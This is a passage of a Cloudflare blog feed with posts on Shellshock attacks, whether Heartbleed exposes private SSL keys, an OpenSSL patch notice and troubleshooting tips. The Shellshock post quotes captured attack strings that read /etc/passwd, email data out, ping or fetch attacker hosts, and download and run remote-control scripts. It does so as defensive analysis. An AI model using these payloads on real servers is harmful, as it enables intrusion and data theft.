Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com</code></pre>
            <p>In this case the URL is <code>/</code> (the main page) and the headers are <code>Accept-Encoding</code>, <code>Accept-Language</code>, etc. These headers provide the web server with information about the capabilities of my web browser, my preferred language, the web site I'm looking for, and what browser I am using.</p><p>It's not uncommon for these to be turned into variables inside a web server so that the web server can examine them. (The web server might want to know what my preferred language is so it can decide how to respond to me).</p><p>For example, inside the web server responding to the request for the CloudFlare home page it's possible that the following variables are defined by copying the request headers character by character.</p>
            <pre><code>HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com</code></pre>
            <p>As long as those variables remain inside the web server software, and aren't passed to other programs running on the web server, the server is not vulnerable.</p><p>Shellshock occurs when the variables are passed into the shell called "bash". Bash is a common shell used on Linux systems. Web servers quite often need to run other programs to respond to a request, and it's common that these variables are passed into bash or another shell.</p><p>The Shellshock problem specifically occurs when an attacker modifies the origin HTTP request to contain the magic <code>() { :; };</code> string discussed above.</p><p>Suppose the attacker change the User-Agent header above from <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36</code> to simply <code>() { :; }; /bin/eject</code>. This creates the following variable inside a web server:</p>
            <pre><code>HTTP_USER_AGENT=() { :; }; /bin/eject</code></pre>
            <p>If that variable gets passed into bash by the web server, the Shellshock problem occurs. This is because bash has special rules for handling a variable starting with <code>() { :; };</code>. Rather than treating the variable <code>HTTP_USER_AGENT</code> as a sequence of characters with no special meaning, bash will interpret it as a command that needs to be executed (I've omitted the deeply technical explanations of why <code>() { :; };</code> makes bash behave like this for the sake of clarity in this essay.)</p><p>The problem is that <code>HTTP_USER_AGENT</code> came from the <code>User-Agent</code> header which is something an attacker controls because it comes into the web server in an HTTP request. And that's a recipe for disaster because an attacker can make a vulnerable server run any command it wants (see examples below).</p><p>The solution is to upgrade bash to a version that doesn't interpret <code>() { :; };</code> in a special way.</p>
    <div>
      <h2>Where attacks are coming from</h2>
      <a href="#where-attacks-are-coming-from">
        
      </a>
    </div>
    <p>When we rolled out protection for all customers we put in place a metric that allowed us to monitor the number of Shellshock attacks attempted. They all received an HTTP 403 Forbidden error code, but we kept a log of when they occurred and basic information about the attack.</p><p>This chart shows the number of attacks per second across the CloudFlare network since rolling out protection for all customers.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4lNLTw4OkPvCuli6C26Jht/94cc58bd2c0b0d0737f6daf43e56852d/Screen-Shot-2014-09-30-at-8-56-33.png" />
            
            </figure><p>From the moment CloudFlare turned on our Shellshock protection up until early this morning, we were seeing 10 to 15 attacks per second. In order of attack volume, these requests were coming from France (80%), US (7%), Netherlands (7%), and then smaller volumes from many other countries.</p><p>At about 0100 Pacific (1000 in Paris) the attacks from France ceased. We are currently seeing around 5 attacks per second. At the time of writing, we've blocked well over 1.1m Shellshock attacks.</p>
    <div>
      <h2>Let your imagination run wild</h2>
      <a href="#let-your-imagination-run-wild">
        
      </a>
    </div>
    <p>Since its so easy to attack vulnerable machines with Shellshock, and because a vulnerable machine will run any command sent to it, attackers have let their imaginations run wild with ways to manipulate computers remotely.</p><p>CloudFlare’s WAF logs the reason it blocked a request allowing us to extract and analyze the actual Shellshock strings being used. Shellshock is being used primarily for reconnaissance: to extract private information, and to allow attackers to gain control of servers.</p><p>Most of the Shellshock commands are being injected using the HTTP User-Agent and Referer headers, but attackers are also using GET and POST arguments and other random HTTP headers.</p><p>To extract private information, attackers are using a couple of techniques. The simplest extraction attacks are in the form:</p>
            <pre><code>() {:;}; /bin/cat /etc/passwd</code></pre>
            <p>That reads the password file <code>/etc/passwd</code>, and adds it to the response from the web server. So an attacker injecting this code through the Shellshock vulnerability would see the password file dumped out onto their screen as part of the web page returned.</p><p>In one attack they simply email private files to themselves. To get data out via email, attackers are using the <code>mail</code> command like this:</p>
            <pre><code>() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' xxxxxxxxxxxxxxxx@gmail.com</code></pre>
            <p>That command first runs <code>whoami</code> to find out the name of the user running the web server. That's especially useful because if the web server is being run as root (the superuser who can do anything) then the server will be a particularly rich target.</p><p>It then sends the user name along with the name of the web site being attacked (example.com above) via email. The name of the website appears in the email subject line.</p><p>At their leisure, the attacker can log into their email and find out which sites were vulnerable. The same email technique can be used to extract data like the password file.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/52ocewvPYryPE5fI5rAsLQ/dedad0888539c70401cb707d10e9205c/7439564750_b9ca34855c_z.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/jdhancock/">JD Hancock</a>)</p>
    <div>
      <h2>Reconnaissance</h2>
      <a href="#reconnaissance">
        
      </a>
    </div>
    <p>By far the most popular attack we've seen (around 83% of all attacks) is called “reconnaissance”. In reconnaissance attacks, the attacker sends a command that will send a message to a third-party machine. The third-party machine will then compile a list of all the vulnerable machines that have contacted it.</p><p>In the past, we've seen lists of compromised machines being turned into botnets for DDoS, spam, or other purposes.</p><p>A popular reconnaissance technique uses the <code>ping</code> command to get a vulnerable machine to send a single packet (called a ping) to a third-party server that the attacker controls. The attack string looks like this:</p>
            <pre><code>() {:;}; ping -c 1 -p cb18cb3f7bca4441a595fcc1e240deb0 attacker-machine.com</code></pre>
            <p>The <code>ping</code> command is normally used to test whether a machine is “alive” or online (an alive machine responds with its own ping). If a web server is vulnerable to Shellshock then it will send a single ping packet (the <code>-c 1</code>) to attacker-machine.com with a payload set by the <code>-p</code>. The payload is a unique ID created by the attacker so they can trace the ping back to the vulnerable web site.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2mNsjINkqc8mE1B3zc22oU/90e21a3ae6c6bc59c136afbd507d1c56/illustration-bash-blog.png" />
            
            </figure><p>Another technique being used to identify vulnerable servers is to make the web server download a web page from an attacker-controlled machine. The attacker can then look in their web server logs to find out which machine was vulnerable. This attack works by sending a Shellshock string like:</p>
            <pre><code>() {:;}; /usr/bin/wget http://attacker-controlled.com/ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA== &gt;&gt; /dev/null</code></pre>
            <p>The attacker looks in the web server log of attacker-controlled.com for entries. The page downloaded is set up by the attacker to be reveal the name of the site being attacked. The <code>ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA==</code> is actually a code indicating that the attacked site was example.com.</p><p><code>ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA==</code> is actually a <a href="http://en.wikipedia.org/wiki/Base64">base64</a> encoded string. When it is decoded it reads:</p>
            <pre><code>example.comShellShockSalt</code></pre>
            <p>From this string the attacker can find out if their attack on example.com was successful, and, if so, they can then go back later to further exploit that site. While I've substituted out the domain that was the target, we are seeing real examples in the wild actually using <code>ShellShockSalt</code> as the salt in the hash.</p>
    <div>
      <h2>Denial of Service</h2>
      <a href="#denial-of-service">
        
      </a>
    </div>
    <p>Another Shellshock attack uses this string</p>
            <pre><code>() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20</code></pre>
            <p>It attempts to run the <code>sleep</code> command in three different ways (since systems have slightly different configurations, sleep might be found in the directories <code>/bin</code> or <code>/sbin</code> or <code>/usr/bin</code>). Whichever sleep it runs, it causes the server to wait 20 seconds before replying . That will consume resources on the machine because a thread or process executing the <code>sleep</code> will do nothing else for 20 seconds.</p><p>This is perhaps the simplest denial-of-service of all. The attackers simply tells the machine to sleep for a while. Send enough of those commands, and the machine could be tied up doing nothing and unable to service legitimate requests.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17Zh1JXPfZfNKPfYkhiRN2/14e516b8408634b4584df62e2153da3a/3894184210_47762c00a9_z.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/petercastleton/">peter castleton</a>)</p>
    <div>
      <h2>Taking Control</h2>
      <a href="#taking-control">
        
      </a>
    </div>
    <p>Around 8% of the attacks we've seen so far have been aimed at directly taking control of a server. Remote control attacks look like this:</p>
            <pre><code>() { :;}; /bin/bash -c \"cd /tmp;wget http://213.x.x.x/ji;curl -O /tmp/ji http://213.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji\"</code></pre>
            <p>This command tries to use two programs (<code>wget</code> and <code>curl</code>) to downloaded a program from a server that the attacker controls. The program is written in the Perl language, and once downloaded it is immediately run. This program sets up remote access for an attacker to the vulnerable web server.</p><p>Another attack uses the Python language to set up a program that can be used to remotely run any command on the vulnerable machine:</p>
            <pre><code>() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://xxxxxxxxxxxxxxx.com/cl.py &gt; /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update &gt; /dev/null&amp; sleep 5; rm -rf /tmp/clamd_update\"</code></pre>
            <p>The <code>cl.py</code> program downloaded is made to look like an update to the ClamAV antivirus program. After a delay of 5 seconds, the attack cleans up after itself by removing the downloaded file (leaving it running only in memory).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ikGFv90UzO7oo38QMIywN/b36ee7e1656b75b73172cdfd5c19ab0b/6933311011_3b385e28c8_o.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/custom-painting-studio/">Jeff Taylor</a>)</p>
    <div>
      <h2>Target Selection</h2>
      <a href="#target-selection">
        
      </a>
    </div>
    <p>Looking at the web sites being attacked, and the URLs being requested, it's possible to make an educated guess at the specific web applications being attacked.</p><p>The top URLs we've seen attacked are: / (23.00%), /cgi-bin-sdb/printenv (15.12%), /cgi-mod/index.cgi (14.93%), /cgi-sys/entropysearch.cgi (15.20%) and /cgi-sys/defaultwebpage.cgi (14.59%). Some of these URLs are used by popular web applications and even a hardware appliance.</p><p>It appears that 23% of the attacks are directed against the <a href="http://cpanel.net/">cPanel</a> web hosting control software, 15% against old Apache installations, and 15% against the <a href="https://www.barracuda.com/">Barracuda</a> hardware products which have a web-based interface.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/486boXqbgwzEOIjozq8rKI/8ba80c35b52a63122d1bcf134d3932a2/cpanel.png" />
            
            </figure><p>The latter is interesting because it highlights the fact that Shellshock isn't just an attack on web sites: it's an attack on anything that's running bash and accessible across the Internet. That could include hardware devices, set-top boxes, laptop computers, even, perhaps, telephones.</p> ]]></content:encoded>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">2FQCkimRP34AHgsqSMgBLa</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[Answering the Critical Question: Can You Get Private SSL Keys Using Heartbleed?]]></title>
            <link>https://blog.cloudflare.com/answering-the-critical-question-can-you-get-private-ssl-keys-using-heartbleed/</link>
            <pubDate>Fri, 11 Apr 2014 02:27:00 GMT</pubDate>
            <description><![CDATA[ Below is what we thought as of 12:27pm UTC. To verify our belief we crowd sourced the investigation. It turns out we were wrong. While it takes effort, it is possible to extract private SSL keys. ]]></description>
            <content:encoded><![CDATA[ <p></p>
    <div>
      <h3>Update:</h3>
      <a href="#update">
        
      </a>
    </div>
    <p><i>Below is what we thought as of 12:27pm UTC. To verify our belief we crowd sourced the investigation. It turns out we were wrong. While it takes effort, it is possible to extract private SSL keys. The challenge was solved by Software Engineer </i><a href="https://twitter.com/indutny"><i>Fedor Indutny</i></a><i> and Ilkka Mattila at NCSC-FI roughly 9 hours after the challenge was first published. Fedor sent 2.5 million requests over the course of the day and Ilkka sent around 100K requests. Our recommendation based on this finding is that everyone reissue and revoke their private keys. CloudFlare has accelerated this effort on behalf of the customers whose SSL keys we manage. </i><a href="/the-results-of-the-cloudflare-challenge"><i>You can read more here</i></a><i>.</i></p><p>The widely-used open source library OpenSSL revealed on Monday it had a major bug, now known as “heartbleed". By sending a specially crafted packet to a vulnerable server running an unpatched version of OpenSSL, an attacker can get up to 64kB of the server’s working memory. This is the result of a classic implementation bug known as a <a href="https://www.owasp.org/index.php/Buffer_over-read">Buffer over-read</a></p><p>There has been speculation that this <a href="https://www.cloudflare.com/the-net/oss-attack-detection/">vulnerability</a> could expose server certificate private keys, making those sites vulnerable to impersonation. This would be the disaster scenario, requiring virtually every service to reissue and revoke its <a href="https://www.cloudflare.com/application-services/products/ssl/">SSL certificates</a>. Note that simply reissuing certificates is not enough, you must revoke them as well.</p><p>Unfortunately, the certificate revocation process is <a href="http://news.netcraft.com/archives/2013/05/13/how-certificate-revocation-doesnt-work-in-practice.html">far from perfect</a> and was never built for revocation at mass scale. If every site revoked its certificates, it would impose a significant burden and performance penalty on the Internet. At CloudFlare scale the reissuance and revocation process could break the CA infrastructure. So, we’ve spent a significant amount of time talking to our CA partners in order to ensure that we can safely and successfully revoke and reissue our customers' certificates.</p><p>While the vulnerability seems likely to put private key data at risk, to date there have been no verified reports of actual private keys being exposed. At CloudFlare, we received early warning of the Heartbleed vulnerability and patched our systems 12 days ago. We’ve spent much of the time running extensive tests to figure out what can be exposed via Heartbleed and, specifically, to understand if private SSL key data was at risk.</p><p>Here’s the good news: after extensive testing on our software stack, we have been unable to successfully use Heartbleed on a vulnerable server to retrieve any private key data. Note that is not the same as saying it is impossible to use Heartbleed to get private keys. We do not yet feel comfortable saying that. However, if it is possible, it is at a minimum very hard. And, we have reason to believe based on the data structures used by OpenSSL and the modified version of NGINX that we use, that it may in fact be impossible.</p><p>To get more eyes on the problem, we have created a site so the world can challenge this hypothesis:</p><p><a href="https://www.cloudflarechallenge.com/heartbleed"><b>CloudFlare Challenge: Heartbleed</b></a></p><p>This site was created by CloudFlare engineers to be intentionally vulnerable to heartbleed. It is not running behind CloudFlare’s network. We encourage everyone to attempt to get the private key from this website. If someone is able to steal the private key from this site using heartbleed, we will post the full details here.</p><p>While we believe it is unlikely that private key data was exposed, we are proceeding with an abundance of caution. We’ve begun the process of reissuing and revoking the keys CloudFlare manages on behalf of our customers. In order to ensure that we don’t overburden the certificate authority resources, we are staging this process. We expect that it will be complete by early next week.</p><p>In the meantime, we’re hopeful we can get more assurance that SSL keys are safe through our crowd-sourced effort to hack them. To get everyone started, we wanted to outline the process we’ve embarked on to date in order to attempt to hack them.</p>
    <div>
      <h3>The bug</h3>
      <a href="#the-bug">
        
      </a>
    </div>
    <p>A heartbeat is a message that is sent to the server just so the server can send it back. This lets a client know that the server is still connected and listening. The heartbleed bug was a mistake in the implementation of the response to a heartbeat message.</p><p>Here is the offending code</p><p>p = &amp;s-&gt;s3-&gt;rrec.data[0]</p><p>[...]</p><p>hbtype = *p++;
n2s(p, payload);
pl = p;</p><p>[...]</p><p>buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;</p><p>[...]</p><p>memcpy(bp, pl, payload);</p><p>The incoming message is stored in a structure called <code>rrec</code>, which contains the incoming request data. The code reads the type (finding out that it's a heartbeat) from the first byte, then reads the next two bytes which indicate the length of the heartbeat payload. In a valid heartbeat request, this length matches the length of the payload sent in the heartbeat request.</p><p>The major problem (and cause of heartbleed) is that the code does not check that this length is the actual length sent in the heartbeat request, allowing the request to ask for more data than it should be able to retrieve. The code then copies the amount of data indicated by the length from the incoming message to the outgoing message. If the length is longer than the incoming message, the software just keeps copying data past the end of the message. Since the length variable is 16 bits, you can request up to 65,535 bytes from memory. The data that lives past the end of the incoming message is from a kind of no-man’s land that the program should not be accessing and may contain data left behind from other parts of OpenSSL.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2cb01fhCapiWLF2XGkA8PE/b6d8d9ce2c3b9f685a700ff50e775799/blog-illustration-heartbleed.png" />
            
            </figure><p>When processing a request that contains a longer length than the request payload, some of this unknown data is copied into the response and sent back to the client. This extra data can contain sensitive information like session cookies and passwords, as we describe in the next section.</p><p>The fix for this bug is simple: check that the length of the message actually matches the length of the incoming request. If it is too long, return nothing. That’s exactly what the OpenSSL patch does.</p>
    <div>
      <h3>Malloc and the Heap</h3>
      <a href="#malloc-and-the-heap">
        
      </a>
    </div>
    <p>So what sort of data can live past the end of the request? The technical answer is “heap data,” but the more realistic answer is that it’s platform dependent.</p><p>On most computer systems, each process has its own set of working memory. Typically this is split into two data structures: the stack and the heap. This is the case on Linux, the operating system that CloudFlare runs on its servers.</p><p>The memory address with the highest value is where the stack data lives. This includes local working variables and non-persistent data storage for running a program. The lowest portion of the address space typically contains the program’s code, followed by static data needed by the program. Right above that is the heap, where all dynamically allocated data lives.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6HWKap7AiqX5LqnPsONfIl/965c80d25eecde1ac67c6f761331f819/image00.gif" />
            
            </figure><p>Managing data on the heap is done with the library calls <code>malloc</code> (used to get memory) and <code>free</code> (used to give it back when no longer needed). When you call <code>malloc</code>, the program picks some unused space in the heap area and returns the address of the first part of it to you. Your program is then able to store data at that location. When you call <code>free</code>, memory space is marked as unused. In most cases, the data that was stored in that space is just left there unmodified.</p><p>Every new allocation needs some unused space from the heap. Typically this is chosen to be at the lowest possible address that has enough room for the new allocation. A heap typically grows upwards; later allocations get higher addresses. If a block of data is allocated early it gets a low address and later allocations will get higher addresses, unless a big early block is freed.</p><p>This is of direct relevance because both the incoming message request (<code>s-&gt;s3-&gt;rrec.data</code>) and the certificate private key are allocated on the heap with <code>malloc</code>. The exploit reads data from the address of the incoming message. For previous requests that were allocated and freed, their data (including passwords and cookies) may still be in memory. If they are stored less than 65,536 bytes higher in the address space than the current request, the details can be revealed to an attacker.</p><p>Requests come and go, recycling memory at around the top of the heap. This makes extracting previous request data very likely from this attack. This is a important in understanding what you can and cannot get at using the vulnerability. Previous requests could contain password data, cookies or other exploitable data. Private keys are a different story; due to the way the heap is structured. The good news is this means that it is much less likely private SSL keys would be exposed.</p>
    <div>
      <h3>Read up, not down</h3>
      <a href="#read-up-not-down">
        
      </a>
    </div>
    <p>In NGINX, the keys are loaded immediately when the process is started, which puts the keys very low in the memory space. This makes it unlikely that incoming requests will be allocated with a lower address space. We tested this experimentally.</p><p>We modified our test version of NGINX to print out the location in memory of each request (<code>s-&gt;s3-&gt;rrec.data</code>), whenever there was an incoming heartbeat. We compared this to the location in memory where the private key is stored and found that we could never get a request to be at a lower address than our private keys regardless of the number of requests we sent. Since the exploit only reads higher addresses, it could not be used to obtain private keys.</p><p>Here is a video of what searching for private keys looks like:</p><p>If NGINX is reloaded, it starts a new process and loads the keys right away, putting them at a low address. Getting a request to be allocated even lower in the memory space than the early-loaded keys is very unlikely.</p><p>We not only checked the location of the private keys, we wrote a tool to repeatedly extract extra data and write the results to file for analysis. We searched through gigabytes of these responses for private key information but did not find any. The most interesting things we found related to certificates were the occasional copy of the public certificate (from a previous output buffer) and some NGINX configuration data. However, the private keys were nowhere to be found.</p><p>To get an idea of what is happening inside the heap used by OpenSSL inside NGINX we wrote another tool to create a graphic showing the location of private keys (red pixels), memory that has never been used (black), memory that has been used but it now sitting idle because of a call to free (blue) and memory that is in use (green).</p><p>This picture shows the state of the heap memory (from left to right) immediately after NGINX has loaded and has yet to serve a request, after a single request, after two requests and after millions of requests. As described above the critical thing to note is that when the first request is made new memory is allocated far beyond the place where the private key is stored. Each 2x2 pixel square represents a single byte of memory; each row is 256 bytes.</p><p>[</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kyjDrvwVyh42FxEm4R0jg/3efd8109ad24e6113734dc280855fa56/Screen_Shot_2014-04-11_at_12.45.44_1.png" />
            
            </figure><p>](<a href="/content/images/heartbleed_1.png">http://staging.blog.mrk.cfdata.org/content/images/heartbleed_1.png</a>)</p><p>Eagle-eyed readers will have noticed a block of memory that was allocated at a lower memory location than the private key. That's true. We looked into it and it is not being used to store the heartbleed (or other) TLS packet data. And it is much more than 64k away from the private key.</p>
    <div>
      <h3>What can you get?</h3>
      <a href="#what-can-you-get">
        
      </a>
    </div>
    <p>We said above that it's possible to get sensitive data from HTTP and TLS requests that the server has handled, even if the private key looks inaccessible.</p><p>Here, for example, is a dump showing some HTTP headers from a previous request to a running NGINX server. These headers would have been transmitted securely over HTTPS but Heartbleed means that an attacker can read them. That’s a big problem because the headers might contain login credentials or a cookie.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2GZ7K9jJ6nAKaFzBvmyZuZ/edbac730a324c4983d126938136887a8/image04_3.png" />
            
            </figure><p>And here’s a copy of the public part of a certificate (as would be sent as part of the TLS/SSL handshake) sitting in memory and readable. Since it’s public this is not in itself dangerous -- by design, you can get the public key of a website even without the vulnerability and doing so does not create risk due to the nature of public/private key cryptography.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ldHLent9feNqC46j7fgYH/fa83d90b96c4a065ed69ad3f5d912e18/image03_3.png" />
            
            </figure><p>We have not fully ruled out the possibility, albeit slim, that some early elements of the heap get reused when NGINX is restarted. In theory, the old memory of the previous process might be available to a newly restarted NGINX. However, after extensive testing, we have not been able to reproduce this situation with an NGINX server on Linux. If a private key is available, it is most likely only available on the first request after restart. After that the chance that the memory is still available is extremely low.</p><p>There have been <a href="https://twitter.com/kennwhite/status/453944475459805184">reports of a private key being stolen</a> from Apache servers, but only on the first request. This fits with our hypothesis that restarting a server may cause the key to be revealed briefly. Apache also creates some special data structures in order to load private keys that are encrypted with a passphrase which may make it more likely for private keys to appear in the vulnerable portion of the stack.</p><p>At CloudFlare we do not restart our NGINX instances very often, so the likelihood that an attacker had hit our server with this exploit on the first request after restart is extremely low. Even if they did, the likelihood of seeing private key material on that request is very low. Moreover, NGINX, which is what CloudFlare’s system is based on, does not create the same special structures for HTTPS processing, making it less likely keys would ever appear in a vulnerable portion of the stack.</p>
    <div>
      <h3>Conclusions</h3>
      <a href="#conclusions">
        
      </a>
    </div>
    <p>We think the stealing private keys on most NGINX servers is at least extremely hard and, likely, impossible. Even with Apache, which we think may be slightly more vulnerable, and we do not use at CloudFlare, we believe the likelihood of private SSL keys being revealed with the Heartbleed vulnerability is very low. That’s about the only good news of the last week.</p><p>We want others to test our results so we created the <a href="https://www.cloudflarechallenge.com/heartbleed">Heartbleed Challenge</a>. Aristotle struggled with the problem of disproving the existence of something that doesn’t exist. You can’t prove the negative, so through experimental results we will never be absolutely sure there’s not a condition we haven’t tested. However, the more eyes we get on the problem, the more confident we will be that, in spite of a number of other ways the Heartbleed vulnerability was extremely bad, we may have gotten lucky and been spared the worst of the potential consequences.</p><p>That said, we’re proceeding assuming the worst. With respect to private keys held by CloudFlare, we patched the vulnerability before the public had knowledge of the vulnerability, making it unlikely that attackers were able to obtain private keys. Still, to be safe, as outlined at the beginning of this post, we are executing on a plan to reissue and revoke potentially affected certificates, including the cloudflare.com certificate.</p><p>Vulnerabilities like this one are challenging because people have imperfect information about the risks they pose. It is important that the community works together to identify the real risks and work towards a safer Internet. We’ll monitor the results on the Heartbleed Challenge and immediately publicize results that challenge any of the above. I will be giving a webinar about this topic next week with updates.</p><p>You can register for that <a href="https://cc.readytalk.com/r/it1914v5pbc0&amp;eom">here</a>.</p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[SSL]]></category>
            <category><![CDATA[OpenSSL]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">7CRHqE4p5vmUjnwj1ujrbO</guid>
            <dc:creator>Nick Sullivan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Staying ahead of OpenSSL vulnerabilities]]></title>
            <link>https://blog.cloudflare.com/staying-ahead-of-openssl-vulnerabilities/</link>
            <pubDate>Mon, 07 Apr 2014 09:00:00 GMT</pubDate>
            <description><![CDATA[ Today a new vulnerability was announced in OpenSSL 1.0.1 that allows an attacker to reveal up to 64kB of memory to a connected client or server (CVE-2014-0160). We fixed this vulnerability last week before it was made public.  ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Today a new vulnerability was announced in OpenSSL 1.0.1 that allows an attacker to reveal up to 64kB of memory to a connected client or server (<a href="http://www.openssl.org/news/vulnerabilities.html#2014-0160">CVE-2014-0160</a>). We fixed this vulnerability last week before it was made public. All sites that use CloudFlare for SSL have received this fix and are automatically protected.</p><p>OpenSSL is the core cryptographic library CloudFlare uses for SSL/TLS connections. If your site is on CloudFlare, every connection made to the HTTPS version of your site goes through this library. As one of the largest deployments of OpenSSL on the Internet today, CloudFlare has a responsibility to be vigilant about fixing these types of bugs before they go public and attackers start exploiting them and putting our customers at risk.</p><p>We encourage everyone else running a server that uses OpenSSL to upgrade to version 1.0.1g to be protected from this vulnerability. For previous versions of OpenSSL, re-compiling with the OPENSSL_NO_HEARTBEATS flag enabled will protect against this vulnerability. OpenSSL 1.0.2 will be fixed in 1.0.2-beta2.</p><p>This bug fix is a successful example of what is called responsible disclosure. Instead of disclosing the vulnerability to the public right away, the people notified of the problem tracked down the appropriate stakeholders and gave them a chance to fix the vulnerability before it went public. This model helps keep the Internet safe. A big thank you goes out to our partners for disclosing this vulnerability to us in a safe, transparent, and responsible manner. We will announce more about our responsible disclosure policy shortly.</p><p>Just another friendly reminder that CloudFlare is on top of things and making sure your sites stay as safe as possible.</p> ]]></content:encoded>
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[OpenSSL]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[SSL]]></category>
            <guid isPermaLink="false">1DeIj3hZtGDLAbL3EpBkp4</guid>
            <dc:creator>Nick Sullivan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Tips: Troubleshooting Common Problems]]></title>
            <link>https://blog.cloudflare.com/cloudflare-tips-troubleshooting-common-problems/</link>
            <pubDate>Fri, 18 Nov 2011 23:08:00 GMT</pubDate>
            <description><![CDATA[ Debugging technical issues online can be tricky. There are many moving pieces; it can be an isolated network connection with the ISP, an issue with your server or one of CloudFlare's data centers could be temporarily having a problem. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Debugging technical issues online can be tricky. There are many moving pieces; it can be an isolated network connection with the ISP, an issue with your server or one of <a href="https://www.cloudflare.com/features-cdn">Cloudflare's data centers</a> could be temporarily having a problem. We wanted to share some tips on how to troubleshoot website issues and provide some good techniques to prevent site issues in the future.</p>
    <div>
      <h4>Website is Unavailable</h4>
      <a href="#website-is-unavailable">
        
      </a>
    </div>
    <p>If you can't get to your website and you see a cached copy of your website or a "<a href="https://support.cloudflare.com/entries/22036452-my-website-is-offline-or-unavailable">Your Website is Unavailable</a>" error page, the first thing to do is to check if your server is having issues.</p>
    <div>
      <h4>How to quickly test if your server is having issues</h4>
      <a href="#how-to-quickly-test-if-your-server-is-having-issues">
        
      </a>
    </div>
    <p><i>For Mac Users:</i>Open the application called terminal on your Mac, and run the following curl command to see if your server is responding:</p><p>curl -v -A firefox/4.0 -H 'Host: yourdomain.com' YourServerIP</p><p>--&gt; YourServerIP: You can get the IP for your server origin by checking your DNS Settings page on your Cloudflare account. It will look something like 192.73.146.94</p><ul><li><p><a href="http://curl.haxx.se/">CURL for Windows</a></p></li><li><p><a href="https://help.ubuntu.com/community/UsingTheTerminal">CURL for Linux</a></p></li></ul><p>When you press enter, you'll get an output message.</p><p>If you get an error message like "can't connect to host" or "500 internal server error", then this means that your server is not responding. You should contact your hosting provider and work with them to resolve the server issue.</p><p>If you get HTML returned, but you still get a site offline or unavailable message from Cloudflare, then this means that connections from<a href="https://www.cloudflare.com/ips">Cloudflare's IPs</a> are being restricted or blocked at either the hosting provider or server level. Please make sure that the CloudFlare IP addresses are allowlisted on your server and with your host.</p>
    <div>
      <h4>If you can't access cPanel or useFTP</h4>
      <a href="#if-you-cant-access-cpanel-or-useftp">
        
      </a>
    </div>
    <p>Cloudflare acts as a reverse proxy. As a result, you can still access cPanel or use FTP, but you will have to do so a little differently. To access cPanel or FTP:</p><ul><li><p><a href="https://support.cloudflare.com/entries/22047603-how-do-i-use-cpanel-with-cloudflare">Accessing cPanel with Cloudflare</a></p></li><li><p><a href="https://support.cloudflare.com/entries/22036662-will-re-routing-through-cloudflare-affect-my-use-of-ftp-uploading">Using FTP with Cloudflare</a></p></li></ul>
    <div>
      <h4>Certain scripts on my website (like ads or social plugins) are breaking or not working</h4>
      <a href="#certain-scripts-on-my-website-like-ads-or-social-plugins-are-breaking-or-not-working">
        
      </a>
    </div>
